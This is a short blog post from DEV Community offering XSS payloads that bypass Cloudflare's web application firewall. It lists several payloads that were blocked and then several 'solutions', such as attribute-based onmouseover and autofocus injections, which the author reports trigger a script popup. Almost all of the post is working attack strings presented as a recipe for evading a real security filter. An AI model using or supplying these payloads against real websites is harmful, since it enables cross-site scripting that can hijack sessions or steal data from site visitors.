DEV Community 👩‍💻👨‍💻

Hafiz Muhammad Attaullah
Hafiz Muhammad Attaullah

Posted on

XSS BYPASS HARD CLOUDFLARE WAF SOLUTION

Problems

Input : "//ONX=""//ONFOCUS=prompt()>
Respond : Blocked

Input : "%01onfocus=test>
Respond : blocked

Input : "%2501onfocus=>
Respond : blocked

Input : "test=[1].map(confirm)>
Respond : blocked

Input : "test=[1].map%26%2300000000000040;1)>
Respond : Blocked

.
.

Solutions :

Input : "onx=() onmouseover=prompt(1)>
Respond : pop up appears

Input : " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
Respond : pop up appears

Input : "onx={} onmouseover=prompt(1)>
Respons : pop up appears

Input : "onx=[] onmouseover=prompt(1)>
Respond : pop up appears

Etc

Top comments (0)

🌚 Friends don't let friends browse without dark mode.

Sorry, it's true.